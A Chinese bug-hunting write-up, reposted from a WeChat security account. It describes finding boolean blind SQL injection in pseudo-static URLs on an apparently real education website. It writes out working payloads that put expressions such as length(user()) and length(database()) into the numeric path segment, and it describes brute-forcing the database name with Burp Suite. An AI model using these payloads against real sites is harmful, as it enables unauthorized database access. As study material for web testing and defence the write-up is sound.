记一次伪静态页面的SQL注入

admin 2024年6月10日22:25:05评论17 views字数 1002阅读3分20秒阅读模式
本文由掌控安全学院 -

jasonjhu

 投稿

前言

最近工作繁忙,许久没有挖洞,打开度娘,凡事随缘,偶米头发~~(⊙﹏⊙)

涉及技能点

  • SQL注入基础原理
  • 盲注常用函数及思路
  • burpsuite基础知识

过程记录

1.发现

在翻阅一EDU站点时,发现路径中带有明显的数字参数

记一次伪静态页面的SQL注入

好像与我们平时习惯的xxx.php?id=不同呃

2.尝试注入

按照以往习惯,先用order by探探底,结果翻车了…应该有自定义逻辑在过滤敏感关键词。

记一次伪静态页面的SQL注入

继续努力,峰回路转,耶~~~!

构造boolen等式时能够被带入查询语句并显示不同效果

当条件不符合时,71-false=71,显示71.html,无数据

http://EDU_SITE/.../..._id/71-false.html

=> SELECT ..FROM .. WHERE ... AND _id=71-false

记一次伪静态页面的SQL注入

而当条件符合时,71-true=70,显示70.html,有数据

http://EDU_SITE/.../..._id/71-true.html

=> SELECT ..FROM .. WHERE ... AND _id=71-true

记一次伪静态页面的SQL注入

3.确定攻击方式,获取数据进行验证

获取用户名长度

http://EDU_SITE/.../..._id/71-(length(user())=12).html

=> SELECT ..FROM .. WHERE ... AND _id=71-(length(user())=12)

记一次伪静态页面的SQL注入

获取数据库长度

http://EDU_SITE/.../..._id/71-(length(database())=6).html

=> SELECT ..FROM .. WHERE ... AND _id=71-(length(database())=6)

记一次伪静态页面的SQL注入

尝试用burpsuite的clusterboom模式对database进行爆破

其中参数1 为位数,参数2 为可能出现的字符明文

记一次伪静态页面的SQL注入

记一次伪静态页面的SQL注入

获得最终database()=db_cms

记一次伪静态页面的SQL注入

3.总结

在尝试sql注入的时候,往往过分关注get传参或者post传参而忽略了URL中自带的注入点,有时候一些明显的数字型参数也能够带入payload

多尝试,多总结

祝各位师兄们也都收获满满~~!

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

 

 

原文始发于微信公众号(掌控安全EDU):漏洞挖掘 | 记一次伪静态页面的SQL注入

 


免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月10日22:25:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次伪静态页面的SQL注入https://cn-sec.com/archives/2834683.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息